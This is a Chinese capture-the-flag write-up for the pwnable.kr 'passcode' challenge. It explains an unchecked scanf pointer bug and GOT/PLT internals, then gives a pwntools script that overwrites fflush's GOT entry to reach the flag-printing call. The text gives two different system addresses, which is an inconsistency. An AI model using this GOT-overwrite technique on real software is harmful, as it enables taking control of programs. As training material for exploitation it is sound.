首先用ssh连进去,一个可执行文件,一个源码文件,一个flag文件,先执行passcode程序,让你输入name,passcode1,passcode2,如图。
我们先用scp命令把文件拷贝下来,scp -P2222 [email protected]:passcode . ,注意后面有一个点,表示拷贝到当前目录的意思。然后看一下源码
#include <stdio.h>
#include <stdlib.h>
void login(){
int passcode1;
int passcode2;
printf("enter passcode1 : ");
scanf("%d", passcode1);
fflush(stdin);
// ha! mommy told me that 32bit is vulnerable to bruteforcing :)
printf("enter passcode2 : ");
scanf("%d", passcode2);
printf("checking...\n");
if(passcode1==338150 && passcode2==13371337){
printf("Login OK!\n");
system("/bin/cat flag");
}
else{
printf("Login Failed!\n");
exit(0);
}
}
void welcome(){
char name[100];
printf("enter you name : ");
scanf("%100s", name);
printf("Welcome %s!\n", name);
}
int main(){
printf("Toddler's Secure Login System 1.0 beta.\n");
welcome();
login();
// something after login...
printf("Now I can safely trust you that you have credential :)\n");
return 0;
}
main函数里连续调用了两个函数,welcome()和login(),welcome()函数有一个100字节的buffer,让你输入name的值。login()函数中定义了两个整数变量passcode1和passcode2,并且让你输入对应的值。后面有一个判断语句,如果passcode1==338150 && passcode2==13371337 ,就获得flag。逻辑上是这么回事,但是刚才运行发现输入了name和passcode1后,程序就直接结束了,没给你输入passcode2的机会。
回过头来再仔细看一下源码,注意这里的scanf("%d", passcode1);,scanf的参数要求传入指针,而passcode1前面是没有取地址运算符&的,所以说他会把passcode1的值当成地址,将你传入的值(你要输入的passcode1)写入到地址为“passcode1的值”的地方,而这个passcode1是未初始化的,所以我们也不知道他会将你的值写入到哪,一般情况下会出现错误而崩溃。
当我们用file命令查看passcode这个文件时,它显示的是动态链接的,关于动态链接,这里补充一些知识点。
GOT表:
概念:每一个外部定义的符号在全局偏移表(Global offset Table)中有相应的条目,GOT位于ELF的数据段中,叫做GOT段。
作用:把位置无关的地址计算重定位到一个绝对地址。程序首次调用某个库函数时,运行时连接编辑器(rtld)找到相应的符号,并将它重定位到GOT之后每次调用这个函数都会将控制权直接转向那个位置,而不再调用rtld。
PLT表:
过程连接表(Procedure Linkage Table),一个PLT条目对应一个GOT条目
当main()函数开始,会请求plt中这个函数的对应GOT地址,如果第一次调用那么GOT会重定位到plt,并向栈中压入一个偏移,程序的执行回到_init()函数,rtld得以调用就可以定位printf的符号地址,第二次运行程序再次调用这个函数时程序跳入plt,对应的GOT入口点就是真实的函数入口地址。
动态连接器并不会把动态库函数在编译的时候就包含到ELF文件中,仅仅是在这个ELF被加载的时候,才会把那些动态函库数代码加载进来,之前系统只会在ELF文件中的GOT中保留一个调用地址.
GOT覆写技术:
原理:由于GOT表是可写的,把其中的函数地址覆盖为我们shellcode地址,在程序进行调用这个函数时就会执行shellcode。
以上关于GOT表、PLT表、GOT覆写技术知识点来源于(http://jing0107.lofter.com/post/1cbc869f_8b3d8a5) ,这道题就是用的GOT覆写技术。
通过调试发现,welcome()函数和login()函数的ebp是同一个,并且通过IDA可以知道name的地址为ebp-70h,passcode1的地址为ebp-10h,他们之间差了60h也就是96个字节,而name为100个字节的buffer,passcode1为4个字节的int,所以说可以用name的值的最后四位覆盖passcode1。
我们注意到有些函数后面会有@plt字样,如图所示
这些函数都是需要定位到GOT表中才能找到函数的绝对地址,如果我们将fflush函数在GOT表中的地址写入到name的最后四个字节中,那么passcode1的值就等于fflush函数在GOT表中的地址,这时候在执行到scanf("%d", passcode1);这个语句时,会将你输入的值写入到GOT表中,这时我们传入system("/bin/cat flag");的地址,当程序执行到fflush()函数时,他会将system("/bin/cat flag");的地址当成fflush()函数的地址,就可以获得flag了。
首先找到GOT表中fflush()的位置,可以通过$objdump -R passcode命令或者$readelf -r passcode命令获取GOT表。
找到fflush()在GOT表中的地址,我们需要将地址0x0804a004写入到name的第97-100位,也就是覆盖passcode1的值,然后找到system("/bin/cat flag");的地址0x080485e3,将这个地址传入passcode1所指的地址中,因为scanf是要求%d输入,所以0x080485ea == 134514154。
以下是解题脚本
#!usr/bin/python
from pwn import *
l = listen()
s = ssh(host='pwnable.kr', user='passcode',port=2222, password='guest')
fflush_got = 0x0804a004
system_addr = 0x80485e3
payload = 'A' * 96 + p32(fflush_got) +str(system_addr)
flag = s.process('/home/passcode/passcode')
flag.sendline(payload)
print flag.recvall()
由于本人也是边学边写,可能有些地方讲的不太清楚,大家有什么问题可以指出来,我会逐渐修改,至于动态链接那部分大家可以去网上搜一下相关知识,以便更深刻的理解。